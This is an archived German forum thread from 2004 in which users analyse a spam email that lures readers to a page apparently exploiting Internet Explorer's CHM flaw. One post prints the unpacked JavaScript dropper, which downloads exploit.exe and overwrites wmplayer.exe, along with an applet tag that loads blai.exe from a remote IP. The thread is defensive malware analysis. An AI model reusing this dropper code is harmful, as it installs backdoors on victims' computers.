PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Exploit] (no subject)



peter1962
17.09.2004, 10:00
From - Sat Sep 18 xx:xx:xx 2004
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <dubhebellini40627 [at] lycos.com>
X-Flags: 1000
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail 30605 invoked by UID: [UID filtered]
Received: from u60-115.u219-71.giga.net.tw (HELO u60-115.u219-71.giga.net.tw) (219.71.60.115)
by mx0.gmx.net (mx021) with SMTP; 18 Sep 2004 xx:xx:xx +0200
Received: from 154.15.96.34 by 219.71.60.115 Sat, 18 Sep 2004 xx:xx:xx -0500
Message-ID: [ID filtered]
From: "frown Hickman" <dubhebellini40627 [at] lycos.com>
Reply-To: "frown Hickman" <dubhebellini40627 [at] lycos.com>
To: poor [at] spamvictim.tld
Subject:
Date: Sat, 18 Sep 2004 xx:xx:xx +0600
X-Mailer: AOL 7.0 for Windows US sub 118 importunate podium
track-chum: cope fuchs toledo
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--06679282214467378"
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 4 (From mass domain over foreign mail server)
not sure if you got this message before since my Outlook crashed :/
i`m feeling very lonely lately, even though i`m a fun person and not that bad lookin :/ feels like I will never find what I`m looking for in life, does it ever happend to you ? my roomate Nikki is trying to cheer me up by asking me to go to the club with her, but I feel like staying home today because I`ve been there so many times and it`s not as fun anymore. If you feel like chatting with me come to my page:
hXXp://www.g-packs21.biz
kisses, pam ;X
budd blurt freight draco
fibrosis gratuity grade ibm 2

....................................................
Ich denke die Seite ist eine IE-Falle
Im Quelltext findet sich ein Verweis auf hXXp://200.16.144.130/exploit.htm
wo anscheinend eine blai.exe automatisch untergeschoben wird.
Wer hat nee Ahnung was das Teil macht?
Links sind wegen der klickwütigen entschärft!
Gruß
Peter

Coke1984
17.09.2004, 18:40
Laut quellcode der exploit.htm läd dieser im IE (in anderen Browsern funzt der code nicht) die datei exploit.chm runter. Laut der Virusdatenbank von panda antivirus läd der beliebigen code runter, also in der regel dann trojaner.
So weit hab ich das ganze allerdings nicht verfolgt, ich werde mal sehen ob ich einen chm-unpacker oder ähnliches finde damit ich mal in den code schauen kann. Hier die original virus definition von panda:

Exploit.CHM is a vulnerability exploit. It is not categorized as a virus, worm or Trojan. To be more precise, it is a malicious code that could be hosted in a web page in order to exploit a vulnerability in the browser Internet Explorer. Affected versions are: 5.01, 5.5 and 6.0 with Service Pack 1.
If an HTML file (for example, a web page) loads a file with a CHM (Compiled HTML) extension using a concrete sequence, the CHM file would be copied to the hard drive of the affected computer, and the script code it contained (as part of the HTML file) would be run. This allows to run arbitrary code on the affected computer, without user`s intervention, just by accessing a malicious web page.
This exploit is being used in order to download and run Trojans and other malware on affected computers.
Currently, there is no security patch available for this vulnerability.

---
http://www.g1n.net - The Alcommunity

Coke1984
17.09.2004, 18:58
Nachtrag: Unter http://www.mjmwired.net/resources/win2ksp/ie-cleanup.html habe ich das tool chmdump gefunden, das die kompilierten chm`s wieder entsprechend entpacken kann.
Daraus ergibt sich ein Javascript folgenden Inhalts:
function getPath(url) {
start = url.indexOf(`http:`)
end = url.indexOf(`EXPLOIT.CHM`)
return url.substring(start, end);
}

payloadURL = getPath(location.href)+`exploit.exe`;

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
location.href = "mms://";
Offenbar läd also jener Javascript die Datei exploit.exe vom server, und überschreibt damit die Startdatei des mediaplayers, so dass dieser jedesmal aufgerufen wird, wenn der mediaplayer starten soll. Dies wiederum funzt nur in englischen windows versionen, in der deutschen lautet der pfad c:programme.. Somit existiert die file zwar, man läuft aber nicht in gefahr diese zu starten wenn man den WMP öffnen will.
Die file exploit.exe selbst enthält dann laut meinem AV die signatur der "Backdoor.Thunk.d", hierzu konnte ich keine allzu nützlichen infos finden... aber naja, trojaner halt.
Tod dem IE!
<font color="#00C000">Edit: Leider konnte ich keinen Hinweis im Code auf die Datei blai.exe finden, aber sie ist inhaltlich identisch mit exploit.exe, auch die selbe AV-Signatur.
Edit-Edit: Ruft man die URL respektive IP-Adresse ohne angehängtes html-dokument auf, wird dort versucht ein Java-Applet zu laden das als source jene Datei läd < -- APPLET ARCHIVE="classload.jar" CODE="GetAccess.class" WIDTH=1 HEIGHT=1><PARAM NAME="ModulePath" VALUE="hXXp://200.16.144.130/blai.exe"></APPLET -- >
</font>
200.16.144.130 ist gehostet in Buenos Aires... abuse schick ich mal raus, aber ich vermute das kann ich mir genausogut auch schenken.

---
http://www.g1n.net - The Alcommunity